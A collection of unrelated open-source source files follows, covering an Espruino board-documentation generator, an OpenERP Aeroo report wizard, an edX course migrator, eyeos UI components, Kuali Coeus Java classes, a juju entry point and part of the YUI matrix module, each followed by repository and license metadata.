line.css('left', x1 - 0.5 * length * (1 - Math.cos(angle)) + "px");
line.css('-moz-transform', "rotate(" + angle + "rad)");
line.css('-webkit-transform', "rotate(" + angle + "rad)");
line.css('-o-transform', "rotate(" + angle + "rad)");
}
</SCRIPT>
""")
if not embeddable:
writeHTML(" </HEAD>")
writeHTML(" <BODY>")
writeHTML(' <H1>'+board.info["name"]+'</H1>')
writeHTML(' <!-- '+boardname+' -->')
if "link" in board.info:
for link in board.info["link"]:
writeHTML(' <P><a href=\"'+link+'\"" target="_blank">'+link+'</a></P>')
writeHTML(' <H2>Specifications</H2>')
writeHTML(' <TABLE style="margin-left:100px;">')
writeHTML(' <TR><TH width="256">Chip</TH><TD>'+board.chip['part']+'</TD></TR>')
writeHTML(' <TR><TH>Package</TH><TD>'+board.chip['package']+'</TD></TR>')
writeHTML(' <TR><TH>RAM</TH><TD>'+str(board.chip['ram'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Flash</TH><TD>'+str(board.chip['flash'])+' kBytes</TD></TR>')
writeHTML(' <TR><TH>Speed</TH><TD>'+str(board.chip['speed'])+' Mhz</TD></TR>')
writeHTML(' <TR><TH>USARTs</TH><TD>'+str(board.chip['usart'])+'</TD></TR>')
writeHTML(' <TR><TH>SPIs</TH><TD>'+str(board.chip['spi'])+'</TD></TR>')
writeHTML(' <TR><TH>I2Cs</TH><TD>'+str(board.chip['i2c'])+'</TD></TR>')
writeHTML(' <TR><TH>USB</TH><TD>'+("Yes" if "USB" in board.devices else "No")+'</TD></TR>')
writeHTML(' <TR><TH>DACs</TH><TD>'+(str(board.chip['dac']) if board.chip['dac']>0 else "No")+'</TD></TR>')
writeHTML(' <TR><TH>SD Card</TH><TD>'+("Yes" if "SD" in board.devices else "No")+'</TD></TR>')
writeHTML(' </TABLE>')
writeHTML(' <P>Like this? Please tell your friends, blog, or <a href="http://www.espruino.com/Order">support us by buying our board</a>!</P>')
writeHTML(' <H2>Pinout</H2>')
writeHTML("""
<P>Hover the mouse over a pin function for more information. Clicking in a function will tell you how to use it in Espruino.</P>
<ul>
<li><span class="pinfunction DEVICE">Purple</span> boxes show pins that are used for other functionality on the board. You should avoid using these unless you know that the marked device is not used.</li>
<li><span class="pinfunction NOTE">!</span> boxes contain extra information about the pin. Hover your mouse over them to see it.</li>
<li><span class="pinfunction NOT_5V">3.3v</span> boxes mark pins that are not 5v tolerant (they only take inputs from 0 - 3.3v, not 0 - 5v).</li>
<li><span class="pinfunction">3.3</span> is a 3.3v output from the on-board Voltage regulator.</li>
<li><span class="pinfunction">GND</span> is ground (0v).</li>
<li><span class="pinfunction">VBAT</span> is the battery voltage output (see <a href="/EspruinoBoard">the Espruino Board Reference</a>).</li>
<li><span class="pinfunction ADC">ADC</span> is an <a href="/ADC">Analog to Digital Converter</a> (for reading analog voltages)</li>""");
if "DAC" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction DAC">DAC</span> is a <a href="/DAC">Digital to Analog Converter</a> (for creating analog voltages). This is not available on all boards.</li>""")
writeHTML(""" <li><span class="pinfunction PWM">PWM</span> is for <a href="/PWM">Pulse Width Modulation</a>. This creates analog voltages from a digital output by sending a series of pulses.</li>
<li><span class="pinfunction SPI">SPI</span> is the 3 wire <a href="/SPI">Serial Peripheral Interface</a>.</li>
<li><span class="pinfunction USART">USART</span> is a 2 wire peripheral for <a href="/USART">Serial Data</a>.</li>
<li><span class="pinfunction I2C">I2C</span> is the 2 wire <a href="/I2C">Inter-Integrated Circuit</a> bus.</li>
""");
if "CAN" in functionsOnBoard: writeHTML(""" <li><span class="pinfunction CAN">CAN</span> is for the <a href="http://en.wikipedia.org/wiki/CAN_bus">Controller Area Network</a>. It is not supported by Espruino.</li>""")
writeHTML(" </ul>");
writeHTML(' <DIV id="boardcontainer">')
writeHTML(' <DIV id="board">')
usedpins = []
for pinstrip in board.board:
if pinstrip[0]!='_':
writeHTML(' <DIV id="'+pinstrip+'">')
for pin in board.board[pinstrip]:
usedpins.append(pin)
dump_pin(pin, pinstrip)
writeHTML(' </DIV>')
otherpins=0
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
otherpins = otherpins + 1
writeHTML(' </DIV id="board">')
writeHTML(' </DIV id="boardcontainer">')
if otherpins>0:
writeHTML(' <DIV id="otherpins">')
writeHTML(' <H2>Pins not on connectors</H2>')
for pinstruct in pins:
pin = pinstruct["name"]
if not pin in usedpins:
dump_pin(pin, "otherpins")
writeHTML(' </DIV>')
writeHTML(' <P></P>')
#writeHTML('<SCRIPT type="text/javascript"> $(function() {');
#writeHTML('var x = $("#board").offset().left+500;');
#writeHTML('var y = $("#board").offset().top+200;');
#d = 12
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(-5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(-5*d)+',x+'+str(5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(5*d)+');');
#writeHTML('drawLine(x+'+str(-5*d)+',y+'+str(5*d)+',x+'+str(-5*d)+',y+'+str(-5*d)+');');
#writeHTML('var p;');
#for pinstrip in board.board:
# if pinstrip[0]!='_':
# for pin in board.board[pinstrip]:
# if pin in pinmap:
# pin = pinmap[pin];
# pininfo = pinutils.findpin(pins, pin, False)
# if "UQFN48" in pininfo["csv"]:
# n = int(pininfo["csv"]["UQFN48"])-1
# n = (n+12) % 48
# if n<12:
# px = (n-6)*d
# py = -6*d
# elif n<24:
# px = 6*d
# py = ((n-12)-6)*d
# elif n<36:
# px = (6-(n-24))*d
# py = 6*d
# else:
# px = -6*d
# py = (6-(n-36))*d
#
# writeHTML("p=$('.pinname:contains(\""+pin+".\")');");
# pinx = "p.offset().left+p.width()/2";
# piny = "p.offset().top+p.height()/2";
# writeHTML('drawLine(x+'+str(px)+',y+'+str(py)+','+pinx+','+piny+', "'+pin+'");');
#writeHTML('});</SCRIPT>');
if not embeddable:
writeHTML(" </BODY>")
writeHTML("</HTML>")
| koltegirish/Espruino | scripts/build_board_docs.py | Python | mpl-2.0 | 14,959 |
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <info@alistek.com>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
import wizard
import pooler
from tools.translate import _
def ir_del(cr, uid, id):
obj = pooler.get_pool(cr.dbname).get('ir.values')
return obj.unlink(cr, uid, [id])
class report_actions_remove_wizard(wizard.interface):
'''
Remove print button
'''
form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="Or you want to remove print button for this report?"/>
</form>'''
ex_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="No Report Action to delete for this report"/>
</form>'''
done_form = '''<?xml version="1.0"?>
<form string="Remove print button">
<label string="The print button is successfully removed"/>
</form>'''
def _do_action(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).read(cr, uid, data['id'], ['report_wizard'], context=context)
if report['report_wizard']:
pool.get('ir.actions.act_window').unlink(cr, uid, data['report_action_id'], context=context)
else:
event_id = pool.get('ir.values').search(cr, uid, [('value','=','ir.actions.report.xml,%d' % data['id'])])[0]
res = ir_del(cr, uid, event_id)
return {}
def _check(self, cr, uid, data, context):
pool = pooler.get_pool(cr.dbname)
report = pool.get(data['model']).browse(cr, uid, data['id'], context=context)
if report.report_wizard:
act_win_obj = pool.get('ir.actions.act_window')
act_win_ids = act_win_obj.search(cr, uid, [('res_model','=','aeroo.print_actions')], context=context)
for act_win in act_win_obj.browse(cr, uid, act_win_ids, context=context):
act_win_context = eval(act_win.context, {})
if act_win_context.get('report_action_id')==report.id:
data['report_action_id'] = act_win.id
return 'remove'
return 'no_exist'
else:
ids = pool.get('ir.values').search(cr, uid, [('value','=',report.type+','+str(data['id']))])
if not ids:
return 'no_exist'
else:
return 'remove'
states = {
'init': {
'actions': [],
'result': {'type':'choice','next_state':_check}
},
'remove': {
'actions': [],
'result': {'type': 'form', 'arch': form, 'fields': {}, 'state': (('end', _('_No')), ('process', _('_Yes')))},
},
'no_exist': {
'actions': [],
'result': {'type': 'form', 'arch': ex_form, 'fields': {}, 'state': (('end', _('_Close')),)},
},
'process': {
'actions': [_do_action],
'result': {'type': 'state', 'state': 'done'},
},
'done': {
'actions': [],
'result': {'type': 'form', 'arch': done_form, 'fields': {}, 'state': (('exit', _('_Close')),)},
},
'exit': {
'actions': [],
'result': {'type': 'state', 'state': 'end'},
},
}
report_actions_remove_wizard('aeroo.report_actions_remove')
| kailIII/emaresa | trunk.pe/report_aeroo/wizard/report_actions_remove.py | Python | agpl-3.0 | 4,658 |
'''
Code for migrating from other modulestores to the split_mongo modulestore.
Exists at the top level of modulestore b/c it needs to know about and access each modulestore.
In general, it's strategy is to treat the other modulestores as read-only and to never directly
manipulate storage but use existing api's.
'''
import logging
from opaque_keys.edx.locator import CourseLocator
from xblock.fields import Reference, ReferenceList, ReferenceValueDict
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.exceptions import ItemNotFoundError
log = logging.getLogger(__name__)
class SplitMigrator:
"""
Copies courses from old mongo to split mongo and sets up location mapping so any references to the old
name will be able to find the new elements.
"""
def __init__(self, split_modulestore, source_modulestore):
super().__init__()
self.split_modulestore = split_modulestore
self.source_modulestore = source_modulestore
def migrate_mongo_course(
self, source_course_key, user_id, new_org=None, new_course=None, new_run=None, fields=None, **kwargs
):
"""
Create a new course in split_mongo representing the published and draft versions of the course from the
original mongo store. And return the new CourseLocator
If the new course already exists, this raises DuplicateItemError
:param source_course_key: which course to migrate
:param user_id: the user whose action is causing this migration
:param new_org, new_course, new_run: (optional) identifiers for the new course. Defaults to
the source_course_key's values.
"""
# the only difference in data between the old and split_mongo xblocks are the locations;
# so, any field which holds a location must change to a Locator; otherwise, the persistence
# layer and kvs's know how to store it.
# locations are in location, children, conditionals, course.tab
# create the course: set fields to explicitly_set for each scope, id_root = new_course_locator, master_branch = 'production' # lint-amnesty, pylint: disable=line-too-long
original_course = self.source_modulestore.get_course(source_course_key, **kwargs)
if original_course is None:
raise ItemNotFoundError(str(source_course_key))
if new_org is None:
new_org = source_course_key.org
if new_course is None:
new_course = source_course_key.course
if new_run is None:
new_run = source_course_key.run
new_course_key = CourseLocator(new_org, new_course, new_run, branch=ModuleStoreEnum.BranchName.published)
with self.split_modulestore.bulk_operations(new_course_key):
new_fields = self._get_fields_translate_references(original_course, new_course_key, None)
if fields:
new_fields.update(fields)
new_course = self.split_modulestore.create_course(
new_org, new_course, new_run, user_id,
fields=new_fields,
master_branch=ModuleStoreEnum.BranchName.published,
skip_auto_publish=True,
**kwargs
)
self._copy_published_modules_to_course(
new_course, original_course.location, source_course_key, user_id, **kwargs
)
# TODO: This should be merged back into the above transaction, but can't be until split.py
# is refactored to have more coherent access patterns
with self.split_modulestore.bulk_operations(new_course_key):
# create a new version for the drafts
self._add_draft_modules_to_course(new_course.location, source_course_key, user_id, **kwargs)
return new_course.id
def _copy_published_modules_to_course(self, new_course, old_course_loc, source_course_key, user_id, **kwargs):
"""
Copy all of the modules from the 'direct' version of the course to the new split course.
"""
course_version_locator = new_course.id.version_agnostic()
# iterate over published course elements. Wildcarding rather than descending b/c some elements are orphaned (e.g., # lint-amnesty, pylint: disable=line-too-long
# course about pages, conditionals)
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.published_only, **kwargs
):
# don't copy the course again.
if module.location != old_course_loc:
# create split_xblock using split.create_item
# NOTE: the below auto populates the children when it migrates the parent; so,
# it doesn't need the parent as the first arg. That is, it translates and populates
# the 'children' field as it goes.
_new_module = self.split_modulestore.create_item(
user_id,
course_version_locator,
module.location.block_type,
block_id=module.location.block_id,
fields=self._get_fields_translate_references(
module, course_version_locator, new_course.location.block_id
),
skip_auto_publish=True,
**kwargs
)
# after done w/ published items, add version for DRAFT pointing to the published structure
index_info = self.split_modulestore.get_course_index_info(course_version_locator)
versions = index_info['versions']
versions[ModuleStoreEnum.BranchName.draft] = versions[ModuleStoreEnum.BranchName.published]
self.split_modulestore.update_course_index(course_version_locator, index_info)
# clean up orphans in published version: in old mongo, parents pointed to the union of their published and draft
# children which meant some pointers were to non-existent locations in 'direct'
self.split_modulestore.fix_not_found(course_version_locator, user_id)
def _add_draft_modules_to_course(self, published_course_usage_key, source_course_key, user_id, **kwargs):
"""
update each draft. Create any which don't exist in published and attach to their parents.
"""
# each true update below will trigger a new version of the structure. We may want to just have one new version
# but that's for a later date.
new_draft_course_loc = published_course_usage_key.course_key.for_branch(ModuleStoreEnum.BranchName.draft)
# to prevent race conditions of grandchilden being added before their parents and thus having no parent to
# add to
awaiting_adoption = {}
for module in self.source_modulestore.get_items(
source_course_key, revision=ModuleStoreEnum.RevisionOption.draft_only, **kwargs
):
new_locator = new_draft_course_loc.make_usage_key(module.category, module.location.block_id)
if self.split_modulestore.has_item(new_locator):
# was in 'direct' so draft is a new version
split_module = self.split_modulestore.get_item(new_locator, **kwargs)
# need to remove any no-longer-explicitly-set values and add/update any now set values.
for name, field in split_module.fields.items():
if field.is_set_on(split_module) and not module.fields[name].is_set_on(module):
field.delete_from(split_module)
for field, value in self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id, field_names=False
).items():
field.write_to(split_module, value)
_new_module = self.split_modulestore.update_item(split_module, user_id, **kwargs)
else:
# only a draft version (aka, 'private').
_new_module = self.split_modulestore.create_item(
user_id, new_draft_course_loc,
new_locator.block_type,
block_id=new_locator.block_id,
fields=self._get_fields_translate_references(
module, new_draft_course_loc, published_course_usage_key.block_id
),
**kwargs
)
awaiting_adoption[module.location] = new_locator
for draft_location, new_locator in awaiting_adoption.items():
parent_loc = self.source_modulestore.get_parent_location(
draft_location, revision=ModuleStoreEnum.RevisionOption.draft_preferred, **kwargs
)
if parent_loc is None:
log.warning('No parent found in source course for %s', draft_location)
continue
old_parent = self.source_modulestore.get_item(parent_loc, **kwargs)
split_parent_loc = new_draft_course_loc.make_usage_key(
parent_loc.block_type,
parent_loc.block_id if parent_loc.block_type != 'course' else published_course_usage_key.block_id
)
new_parent = self.split_modulestore.get_item(split_parent_loc, **kwargs)
# this only occurs if the parent was also awaiting adoption: skip this one, go to next
if any(new_locator.block_id == child.block_id for child in new_parent.children):
continue
# find index for module: new_parent may be missing quite a few of old_parent's children
new_parent_cursor = 0
for old_child_loc in old_parent.children:
if old_child_loc.block_id == draft_location.block_id:
break # moved cursor enough, insert it here
# sibling may move cursor
for idx in range(new_parent_cursor, len(new_parent.children)):
if new_parent.children[idx].block_id == old_child_loc.block_id:
new_parent_cursor = idx + 1
break # skipped sibs enough, pick back up scan
new_parent.children.insert(new_parent_cursor, new_locator)
new_parent = self.split_modulestore.update_item(new_parent, user_id)
def _get_fields_translate_references(self, xblock, new_course_key, course_block_id, field_names=True):
"""
Return a dictionary of field: value pairs for explicitly set fields
but convert all references to their BlockUsageLocators
Args:
field_names: if Truthy, the dictionary keys are the field names. If falsey, the keys are the
field objects.
"""
def get_translation(location):
"""
Convert the location
"""
return new_course_key.make_usage_key(
location.block_type,
location.block_id if location.block_type != 'course' else course_block_id
)
result = {}
for field_name, field in xblock.fields.items():
if field.is_set_on(xblock):
field_value = field.read_from(xblock)
field_key = field_name if field_names else field
if isinstance(field, Reference) and field_value is not None:
result[field_key] = get_translation(field_value)
elif isinstance(field, ReferenceList):
result[field_key] = [
get_translation(ele) for ele in field_value
]
elif isinstance(field, ReferenceValueDict):
result[field_key] = {
key: get_translation(subvalue)
for key, subvalue in field_value.items()
}
else:
result[field_key] = field_value
return result
| eduNEXT/edx-platform | common/lib/xmodule/xmodule/modulestore/split_migrator.py | Python | agpl-3.0 | 11,976 |
<?php
/*
* eyeos - The Open Source Cloud's Web Desktop
* Version 2.0
* Copyright (C) 2007 - 2010 eyeos Team
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License version 3 as published by the
* Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
* details.
*
* You should have received a copy of the GNU Affero General Public License
* version 3 along with this program in the file "LICENSE". If not, see
* <http://www.gnu.org/licenses/agpl-3.0.txt>.
*
* See www.eyeos.org for more details. All requests should be sent to licensing@eyeos.org
*
* The interactive user interfaces in modified source and object code versions
* of this program must display Appropriate Legal Notices, as required under
* Section 5 of the GNU Affero General Public License version 3.
*
* In accordance with Section 7(b) of the GNU Affero General Public License version 3,
* these Appropriate Legal Notices must retain the display of the "Powered by
* eyeos" logo and retain the original copyright notice. If the display of the
* logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices
* must display the words "Powered by eyeos" and retain the original copyright notice.
*/
/**
* Users is invited
*
* Properties to set: $event: array (
* 'type' => "Groups_InvitedUsersSender"
* 'eventData' => array (
* usersId: array of userIds or just a string with an userId
* groupId: String the id of the group
* )
* )
*/
class InvitedUsersSenderEvent implements ISimpleEventHandler {
/**
* Fill the properties of the event
*
* @param <AbstractEventNotification> $event
*/
public function autoFill (AbstractEventNotification $event) {
if ($event->getEventData() === null) {
throw new EyeInvalidArgumentException('You must specify the eventData property');
}
$eventData = $event->getEventData();
if (!isset($eventData['usersId']) || (!is_string($eventData['usersId']) && !is_int($eventData['usersId']))) {
throw new EyeInvalidArgumentException('Missing or invalid $eventData[\'usersId\']');
}
if (!isset($eventData['groupId']) || !is_string($eventData['groupId'])) {
throw new EyeInvalidArgumentException('Missing or invalid $eventData[\'groupId\']');
}
$userIds = $eventData['usersId'];
$wGroupId = $eventData['groupId'];
$wGroupName = GroupsEventHandler::retrieveWorkgroupName($wGroupId);
if (!is_array($userIds)) {
$username = GroupsEventHandler::retrieveContactName($userIds);
$event->setMessageInformation(array('User %s was invited in %s group.', array($username, $wGroupName)));
} else {
$usernames = array();
foreach ($userIds as $userId) {
$usernames[] = GroupsEventHandler::retrieveContactName($userId);
}
$usernamesString = implode(', ', $usernames);
$event->setMessageInformation(array('Users %s were invited in %s group', array($usernamesString, $wGroupName)));
}
$event->setIsQuestion(false);
}
}
?>
| DavidGarciaCat/eyeos | eyeos/system/Frameworks/Events/Handlers/Groups/InvitedUsersSenderEvent.php | PHP | agpl-3.0 | 3,272 |
// Copyright 2014 Canonical Ltd.
// Copyright 2014 Cloudbase Solutions
// Licensed under the AGPLv3, see LICENCE file for details.
// +build !windows
package main
import (
"os"
"github.com/juju/juju/juju/osenv"
"github.com/juju/utils/featureflag"
)
func init() {
featureflag.SetFlagsFromEnvironment(osenv.JujuFeatureFlagEnvKey)
}
func main() {
MainWrapper(os.Args)
}
| tsakas/juju | cmd/jujud/main_nix.go | GO | agpl-3.0 | 378 |
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2015 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.kuali.coeus.propdev.impl.abstrct;
import org.apache.commons.beanutils.PropertyUtils;
import org.apache.commons.lang3.StringUtils;
import org.kuali.coeus.propdev.impl.core.ProposalDevelopmentDocument;
import org.kuali.coeus.propdev.impl.core.ProposalDevelopmentDocumentForm;
import org.kuali.coeus.sys.framework.service.KcServiceLocator;
import org.kuali.rice.core.api.util.ConcreteKeyValue;
import org.kuali.rice.core.api.util.KeyValue;
import org.kuali.rice.krad.data.DataObjectService;
import org.kuali.rice.krad.uif.control.UifKeyValuesFinderBase;
import org.kuali.rice.krad.uif.field.InputField;
import org.kuali.rice.krad.uif.view.ViewModel;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.beans.factory.annotation.Qualifier;
import org.springframework.stereotype.Component;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
/**
* Finds the available set of supported Abstract Types. See
* the method <code>getKeyValues()</code> for a full description.
*
* @author Kuali Research Administration Team (kualidev@oncourse.iu.edu)
*/
@Component("abstractTypeValuesFinder")
public class AbstractTypeValuesFinder extends UifKeyValuesFinderBase {
@Autowired
@Qualifier("dataObjectService")
private DataObjectService dataObjectService;
@Override
public List<KeyValue> getKeyValues(ViewModel model, InputField field){
ProposalDevelopmentDocumentForm form = (ProposalDevelopmentDocumentForm) model;
String selectedAbstractType = getFieldValue(model,field);
Collection<AbstractType> abstractTypes = getDataObjectService().findAll(AbstractType.class).getResults();
List<KeyValue> keyValues = new ArrayList<KeyValue>();
keyValues.add(new ConcreteKeyValue("", "select"));
for (AbstractType abstractType : abstractTypes) {
if (!hasAbstract(form.getProposalDevelopmentDocument(), abstractType) || StringUtils.equals(abstractType.getCode(),selectedAbstractType)) {
keyValues.add(new ConcreteKeyValue(abstractType.getCode(), abstractType.getDescription()));
}
}
return keyValues;
}
private boolean hasAbstract(ProposalDevelopmentDocument doc, AbstractType abstractType) {
if (doc != null) {
List<ProposalAbstract> proposalAbstracts = doc.getDevelopmentProposal().getProposalAbstracts();
for (ProposalAbstract proposalAbstract : proposalAbstracts) {
if (proposalAbstract.getAbstractTypeCode().equals(abstractType.getCode())) {
return true;
}
}
}
return false;
}
private String getFieldValue(ViewModel model, InputField field) {
if (!StringUtils.startsWith(field.getBindingInfo().getBindingPath(),"new")) {
try {
return (String) PropertyUtils.getNestedProperty(model,field.getBindingInfo().getBindingPath());
} catch (Exception e) {
throw new RuntimeException("could not retrieve abstract type from the input field", e);
}
}
return StringUtils.EMPTY;
}
public DataObjectService getDataObjectService() {
if (dataObjectService == null) {
dataObjectService = KcServiceLocator.getService(DataObjectService.class);
}
return dataObjectService;
}
public void setDataObjectService(DataObjectService dataObjectService) {
this.dataObjectService = dataObjectService;
}
}
| sanjupolus/kc-coeus-1508.3 | coeus-impl/src/main/java/org/kuali/coeus/propdev/impl/abstrct/AbstractTypeValuesFinder.java | Java | agpl-3.0 | 4,358 |
/*
* eyeos - The Open Source Cloud's Web Desktop
* Version 2.0
* Copyright (C) 2007 - 2010 eyeos Team
*
* This program is free software; you can redistribute it and/or modify it under
* the terms of the GNU Affero General Public License version 3 as published by the
* Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
* FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more
* details.
*
* You should have received a copy of the GNU Affero General Public License
* version 3 along with this program in the file "LICENSE". If not, see
* <http://www.gnu.org/licenses/agpl-3.0.txt>.
*
* See www.eyeos.org for more details. All requests should be sent to licensing@eyeos.org
*
* The interactive user interfaces in modified source and object code versions
* of this program must display Appropriate Legal Notices, as required under
* Section 5 of the GNU Affero General Public License version 3.
*
* In accordance with Section 7(b) of the GNU Affero General Public License version 3,
* these Appropriate Legal Notices must retain the display of the "Powered by
* eyeos" logo and retain the original copyright notice. If the display of the
* logo is not reasonably feasible for technical reasons, the Appropriate Legal Notices
* must display the words "Powered by eyeos" and retain the original copyright notice.
*/
/**
* eyeos.ui.toolbar.LabelHeader - Styling...
* Extending a eyeos.ui.toolbar.ImageHeader, to implement the eyeos
* look and feel behaviour.
* The two labels will be top-bottom aligned as default, but it can be changed
* using the {@see this#order}.
*/
qx.Class.define('eyeos.ui.toolbar.LabelHeader', {
extend : eyeos.ui.toolbar.ImageHeader,
construct : function(leftLabel, rightLabel) {
arguments.callee.base.call(this, null, null);
this.setLeftLabel(leftLabel);
this.setRightLabel(rightLabel);
this._setEyeosStyle();
},
properties: {
/**
* the widget's left label.
*/
leftLabel: {
init: null
},
/**
* the widget's right label.
*/
rightLabel: {
init: null
}
},
members: {
/**
* Apply the eyeos look and feel.
*/
_setEyeosStyle: function() {
this.getChildrenContainer().setLayout(new qx.ui.layout.VBox());
this.setDecorator(null);
this.removeAll();
var leftButton = new qx.ui.toolbar.Button(tr(this.getLeftLabel()));
leftButton.addListener('execute', function() {
this.setMode(false);
}, this);
this.add(leftButton);
var rightButton = new qx.ui.toolbar.Button(tr(this.getRightLabel()));
rightButton.addListener('execute', function() {
this.setMode(true);
}, this);
this.add(rightButton);
this.addListener('changeOrder', function() {
switch (this.getOrder()) {
case 'left-right':
this.getChildrenContainer().setLayout(new qx.ui.layout.HBox());
case 'top-bottom':
this.getChildrenContainer().setLayout(new qx.ui.layout.VBox());
}
}, this);
}
}
}); | cloudspaces/eyeos-u1db | eyeos/extern/js/eyeos.ui.toolbar.LabelHeader.js | JavaScript | agpl-3.0 | 3,141 |
/*
* Kuali Coeus, a comprehensive research administration system for higher education.
*
* Copyright 2005-2015 Kuali, Inc.
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License as
* published by the Free Software Foundation, either version 3 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package org.kuali.kra.award.home;
import org.kuali.coeus.common.framework.rolodex.Rolodex;
import org.kuali.coeus.sys.framework.model.KcPersistableBusinessObjectBase;
public class AwardTemplateContact extends KcPersistableBusinessObjectBase {
private static final long serialVersionUID = 5168275576240665727L;
private Integer templateContactId;
private AwardTemplate awardTemplate;
private String roleCode;
private Integer rolodexId;
private ContactType contactType;
private Rolodex rolodex;
public AwardTemplateContact() {
}
public Integer getTemplateContactId() {
return templateContactId;
}
public void setTemplateContactId(Integer templateContactId) {
this.templateContactId = templateContactId;
}
public AwardTemplate getAwardTemplate() {
return awardTemplate;
}
public void setAwardTemplate(AwardTemplate awardTemplate) {
this.awardTemplate = awardTemplate;
}
/**
* Gets the contactTypeCode attribute.
* @return Returns the contactTypeCode.
*/
public String getRoleCode() {
return roleCode;
}
/**
* Sets the contactTypeCode attribute value.
* @param contactTypeCode The contactTypeCode to set.
*/
public void setRoleCode(String contactTypeCode) {
this.roleCode = contactTypeCode;
}
/**
* Gets the rolodexId attribute.
* @return Returns the rolodexId.
*/
public Integer getRolodexId() {
return rolodexId;
}
/**
* Sets the rolodexId attribute value.
* @param rolodexId The rolodexId to set.
*/
public void setRolodexId(Integer rolodexId) {
this.rolodexId = rolodexId;
}
/**
* Gets the contactType attribute.
* @return Returns the contactType.
*/
public ContactType getContactType() {
return contactType;
}
/**
* Sets the contactType attribute value.
* @param contactType The contactType to set.
*/
public void setContactType(ContactType contactType) {
this.contactType = contactType;
}
/**
* Gets the rolodex attribute.
* @return Returns the rolodex.
*/
public Rolodex getRolodex() {
return rolodex;
}
/**
* Sets the rolodex attribute value.
* @param rolodex The rolodex to set.
*/
public void setRolodex(Rolodex rolodex) {
this.rolodex = rolodex;
}
}
| sanjupolus/KC6.oLatest | coeus-impl/src/main/java/org/kuali/kra/award/home/AwardTemplateContact.java | Java | agpl-3.0 | 3,267 |
import hashlib
def make_hashkey(seed):
'''
Generate a hashkey (string)
'''
h = hashlib.md5()
h.update(str(seed))
return h.hexdigest()
def get_request_ip(request):
'''
Retrieve the IP origin of a Django request
'''
ip = request.META.get('HTTP_X_REAL_IP','') # nginx reverse proxy
if not ip:
ip = request.META.get('REMOTE_ADDR','None')
return ip
| GbalsaC/bitnamiP | xqueue/queue/util.py | Python | agpl-3.0 | 402 |
/*
YUI 3.11.0 (build d549e5c)
Copyright 2013 Yahoo! Inc. All rights reserved.
Licensed under the BSD License.
http://yuilibrary.com/license/
*/
YUI.add('matrix', function (Y, NAME) {
/**
* Matrix utilities.
*
* @class MatrixUtil
* @module matrix
**/
var MatrixUtil = {
/**
* Used as value for the _rounding method.
*
* @property _rounder
* @private
*/
_rounder: 100000,
/**
* Rounds values
*
* @method _round
* @private
*/
_round: function(val) {
val = Math.round(val * MatrixUtil._rounder) / MatrixUtil._rounder;
return val;
},
/**
* Converts a radian value to a degree.
*
* @method rad2deg
* @param {Number} rad Radian value to be converted.
* @return Number
*/
rad2deg: function(rad) {
var deg = rad * (180 / Math.PI);
return deg;
},
/**
* Converts a degree value to a radian.
*
* @method deg2rad
* @param {Number} deg Degree value to be converted to radian.
* @return Number
*/
deg2rad: function(deg) {
var rad = deg * (Math.PI / 180);
return rad;
},
/**
* Converts an angle to a radian
*
* @method angle2rad
* @param {Objecxt} val Value to be converted to radian.
* @return Number
*/
angle2rad: function(val) {
if (typeof val === 'string' && val.indexOf('rad') > -1) {
val = parseFloat(val);
} else { // default to deg
val = MatrixUtil.deg2rad(parseFloat(val));
}
